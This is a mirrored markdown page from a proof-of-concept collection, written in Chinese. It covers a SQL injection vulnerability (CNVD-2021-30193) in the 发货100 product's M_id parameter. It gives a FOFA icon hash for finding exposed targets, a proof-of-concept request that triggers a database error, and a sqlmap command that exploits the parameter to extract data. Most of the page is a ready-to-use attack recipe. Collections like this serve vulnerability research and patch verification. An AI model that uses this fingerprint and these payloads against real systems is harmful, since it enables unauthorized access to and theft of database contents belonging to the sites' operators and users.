mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-08 20:36:14 +00:00
39 lines
692 B
Markdown
39 lines
692 B
Markdown
|
|
# 发货100 M_id SQL注入漏洞 CNVD-2021-30193
|
|||
|
|
|
|||
|
|
## 漏洞描述
|
|||
|
|
|
|||
|
|
发货100 M_id参数存在SQL注入漏洞, 攻击者通过漏洞可以获取数据库敏感信息
|
|||
|
|
|
|||
|
|
## 漏洞影响
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
发货100
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
## FOFA
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
icon_hash="1420424513"
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
## 漏洞复现
|
|||
|
|
|
|||
|
|
主页面如下
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
使用POC
|
|||
|
|
|
|||
|
|
```plain
|
|||
|
|
/?M_id=1%27&type=product
|
|||
|
|
```
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
数据库出现报错, 使用Sqlmap注入
|
|||
|
|
|
|||
|
|
```plain
|
|||
|
|
sqlmap -u 'http://xxx.xxx.xxx.xxx/?M_id=11%27&type=product' -p M_id
|
|||
|
|
```
|
|||
|
|
|
|||
|
|

|